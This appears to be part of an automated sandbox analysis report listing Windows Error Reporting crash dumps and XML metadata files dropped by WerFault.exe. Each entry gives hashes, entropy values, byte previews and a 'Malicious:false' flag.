                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...........0...j...........L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER480.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.716950094441577
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBjg6psguYUMaAjAbpB089bJ5sf2Zjm:R6lXJPg6psJYdaAjAVJSf9
                                                                            MD5:C01EF1B066245D16F7D3B043D5331DDB
                                                                            SHA1:EE3094F71B014FB515EC4BAD3BC056D12979976F
                                                                            SHA-256:AF51023306184607867D7DE060608DFA3EB9E9062CF57EE69B7D88983DA4B0A9
                                                                            SHA-512:F0C6350342256E28CD44308512DF4EE168F2F9DDDBA5004A69699E6422692AA427431513D24DA435231505481CFD00774073B4EAFFBFF7F0B1CB62CA7D767BCE
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A0.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.484726205992288
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYyFYm8M4JKTBFi+q8v+TGh0B9ned:uIjfrI7Cj67VH0JLKt0B9ned
                                                                            MD5:B3AEE8C56D03FFC924DD53EFF008D21A
                                                                            SHA1:C3BD33B8C4838621B30F2B4817EE35F4FE1DEBFF
                                                                            SHA-256:320B98F93F9EBB298DD998CBF0B23C5AEEF2448187B8C0355711D0CC5C17DAB2
                                                                            SHA-512:4024C1153BFBFAD85D3803DD87DAF0ADB97425FDA0394A358FD77DBB211F81988C206608EACF1911C0E2C343DF2870F9F6FBD001904C54DB6C446BC2A3F26988
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER809.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:44 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):64082
                                                                            Entropy (8bit):2.24873703572224
                                                                            Encrypted:false
                                                                            SSDEEP:192:Q7yuX6tlLXFkltBjemO2gtgCEyWN6hsSEPr9KBYG42fqDaklr+1XLY3hyCHW76aF:2ynlBkltBihgbx6hsSEjmYasa9mqNk+
                                                                            MD5:BD9670AB1386E776FEFE58ECA0102360
                                                                            SHA1:3F62B406A4F371D7FFE90D5FE21FC08F01637C0D
                                                                            SHA-256:C15BADE0117805A7A516DE46C7AE741F25E9C4B09D4060B2FC468C9B82D0F512
                                                                            SHA-512:489F7B899C66EAF4CC01CE448CC8A696309C39182EBFB58419539E8E51E31634806EDBA4687A4AACA6B842BD11EDE2A4B36598B632E3DB2A2113D8354F8851C3
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERA0E.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7170445130747782
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVB56hszuYUc0pBG89bf5sfiVm:R6lXJd6hsaYNMfSfJ
                                                                            MD5:856A5FEAE0B9CC724B7893A0A66169B9
                                                                            SHA1:E2182993B400E86FB300FEE1A61A79C441E433C0
                                                                            SHA-256:71C9B8670F62E0FDDDD21169D1D88DC27C59CE4AD2A98A39A9E78AAB3394EEEA
                                                                            SHA-512:25213543C2CBD3ED43D02DD6B662581992153F4CD9CCD70B644FA7CDCF40394892EF93C935E0704F6B2EFF7A46830F77D1F55F592BC6EF0EBDE215BDCA8E0036
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9B.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.487714946323808
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VY8vYm8M4JKTJFS+q8v+Tuh0B9ned:uIjfrI7Cj67VjyJDKF0B9ned
                                                                            MD5:656E4108B078A98B521AD6C2ED31D8D3
                                                                            SHA1:A3269D853F29F3051C4F3FAAC6E3849A207430C3
                                                                            SHA-256:9AD47FA5BEDFDEAE7AE4610FC19F7E4D038A0FF760A6C0F992AE26C817C8BCE1
                                                                            SHA-512:74ACBE472E0875B7FD5FCF4E230B16BC78EB68AD1B586CEFE0DA8C2804F8AB5970E2E247FB908159946F1A2B3FCF72FF114E02961AF1878BE7307CE32A368DDD
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFE0.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:34 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):58092
                                                                            Entropy (8bit):2.2805011266538715
                                                                            Encrypted:false
                                                                            SSDEEP:192:aUY7dXNUeXQIP78SYmO2gtpwiHWisKOhdU2fSZLak9j+1XLY3hyCHW76EoBponE7:fY7v8IP78SchqiTsKOhd0VapmeoUs
                                                                            MD5:E47DCCD37400E945A14DA04A43B20732
                                                                            SHA1:CAE3A73F97058AD6E701641614FF8FA03AF4ADBA
                                                                            SHA-256:2B9316E124F05CB8577C1890DC99D7DC2030EB6A759E44746DFC153138E16D72
                                                                            SHA-512:6AA408FC617F1B754EFDCDEF828FC193916B49840F5425EA0AE5D01FBA90B25984A0DE1A05A8F41A570A1866266F69387F153E4B412EEF05B526955C0EBB324D
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................4................+..........T.......8...........T...............d.......................................................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0AC.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8436
                                                                            Entropy (8bit):3.6929282118121796
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBB6f6YhDl6rgmfUc0pBB89bh5sfzLm:R6lXJF6f6Yll6rgmfNNhSf+
                                                                            MD5:D383770D0B845F79CF3E2C0B8C2616A2
                                                                            SHA1:5D89F22FFF151BF8FAA9B6794CD9762F034AFB7D
                                                                            SHA-256:53C58C3FC0DA8B4CD0CB1F22548656CC44465180EE94CC39CCD2BF6CA2B26190
                                                                            SHA-512:936DBE58E0C67BEC8EF17A9111D680582A39C5DF138359BB06B066A74BACA3CF13FBF6184F0ACA9F0AAA30F86C7D5E6A5E484BA55C42AF17B6DEB1D599BF730D
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0CC.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.4852100672899935
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYhYm8M4JKTJF7P+q8v+Tuh0B9ned:uIjfrI7Cj67VVJ+KF0B9ned
                                                                            MD5:1BCBE9453C15B599B320B4E54A7C1837
                                                                            SHA1:C1276A1E72C8FC0B1C89EC6CFC005BB25B9BF629
                                                                            SHA-256:4A366418836040B88220450433ACC03B2A9FB223DF78521A6561982BECFC948B
                                                                            SHA-512:3568B1F5574C408325E602E87BEAFC6FD673C05B75415B1CCAC00B4664D436552748A8FFEAE8ED3AEFC014106452164F4534C16CB541D4E941230795B654EB0C
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2BE.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:35 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):64068
                                                                            Entropy (8bit):2.267709531496996
                                                                            Encrypted:false
                                                                            SSDEEP:384:/SWb4rn40hQCpyhsSEeCTiqMjxasmHtwBc:/5biXhVpyhCiftaABc
                                                                            MD5:206C58DE34C3FDC57B9F16EA2CE714F3
                                                                            SHA1:CF66FAE337DA57A9EE28FB716F98BA9F0C9C525F
                                                                            SHA-256:28162539B191062B7B465A73A66BDC77E18022C58C7A124B185C108E51E541D1
                                                                            SHA-512:A0023C8049DF6C36EE355A03ED02C72C96E5ECCB19181F8A768188BC142EF5AA666AD36E829113FE9BFE39A1EFD27AF1B275C7E1749BE59FCABC417305B7C72E
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................................./..........T.......8...........T...........x...........................................................................................................eJ...... .......GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE35B.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8440
                                                                            Entropy (8bit):3.6942226235416085
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBw60XoFL6YhU6OgmfUc0pBa89bY5sfiIm:R6lXJ060XoJ6YC6OgmfNwYSfM
                                                                            MD5:89F5F2FFCBEB2F2E936E8FBE94254259
                                                                            SHA1:88DA26897ACC687F10133902D94B78F2FF654FB0
                                                                            SHA-256:BAED54AF90DB2E1EABA04E3ECF5C9C8741D508AC48ED2523992E6540D819E510
                                                                            SHA-512:A4E17523AB95C312024C922FFE5CFE45C76F91D56882F4E32859E57A1B50FB9652359C2A2D410A5CCC2F64C955B2FC7D0C61823AAC0F534471AE6D881281A27B
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE39B.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.489165730083916
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYs7Ym8M4JKTJFx+q8v+Tuh0B9ned:uIjfrI7Cj67VreJIKF0B9ned
                                                                            MD5:E5669939A43B84E1DB55B0F6F2424153
                                                                            SHA1:BF5636913C1AE1CF6D3A1D6F1889F20AD0CE7F56
                                                                            SHA-256:E3A86E9D3523B700C03D7B3D9BAFB0CB525B055311C7347CF50C819F301D1A28
                                                                            SHA-512:5A0FA5FCBE96DE3E80E617659AA1CD439434D2D9AAB681DD4F9588D21D4430067F8FDFB803C5D19BEE7B33367E8F973A2FD33B995488945A8BDF774E3C3A1B8B
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WEREA9E.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:37 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):62422
                                                                            Entropy (8bit):2.2329892933340934
                                                                            Encrypted:false
                                                                            SSDEEP:192:BzyuX6tlLXFkltBymO2gtg+XWtW2siiFwguBENS2PLak9j+1XLY3hyCHW764I6MB:5ynlBkltkhgcWhs9wHE5apmj6Imm
                                                                            MD5:DE319A4A3FF2AC5E9EAED05381552758
                                                                            SHA1:749E1C6F52F6F6144BC2D48C42BF0A5A3D5E9E32
                                                                            SHA-256:BEAD3FB92D7B4ADEDB001488BC29D3D8ED2A98D974F3E868F1F5AC9707EFBBA0
                                                                            SHA-512:9F0E0F6B3316212D00FFB7A5F487A755240C908B4960DAE114A0C56D4704E73E07E76680096A7660207F7F54BBF9957E65D7726531D9181088DD62D7E593FC01
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERED7D.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6428
                                                                            Entropy (8bit):3.716759502201914
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVB4q6Z5SQYUMaAjAbpBa89bK5sfh/um:R6lXJ8q6Z5VYdaAjAHKSfh/
                                                                            MD5:C6CE09F91AE87C2EDCF964F7AE6637C8
                                                                            SHA1:FC3E895CCE9F2DB18C51ECDE6C0918706EC63415
                                                                            SHA-256:5BFF2029CEF732ADFE72140AD75F951F9327093859F2637F4A438456789965A5
                                                                            SHA-512:90A2C5E86AD44E60D5CA37CB9394D28849460A8C99DDEA39389E3152670CC0A9384961D7304A5EE385888A4862E119D88D379368B04398AF6B881EEB4A67E481
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDAD.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.486491156732046
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VY7Ym8M4JKTBFHZ+q8v+TGh0B9ned:uIjfrI7Cj67VDJ0ZKt0B9ned
                                                                            MD5:3B714C700D49C18834A423C77CC3C796
                                                                            SHA1:3C8903FAFC2DCBED9B97A8333A923C9A2F0744EE
                                                                            SHA-256:2839287998A6690C9C6A8240EB6B6C8D3F2FE240173B989FF51F13A67AFFABBA
                                                                            SHA-512:0AA75CBB42FA5D38B1C705610E3AE00DAA4F2B79C096EDC4922B6C14BEFEC2EE1BDBA8E662BDEE1C11D976D450D2B4927B86002BD7F947322F65A2360DD23025
                                                                            Malicious:false
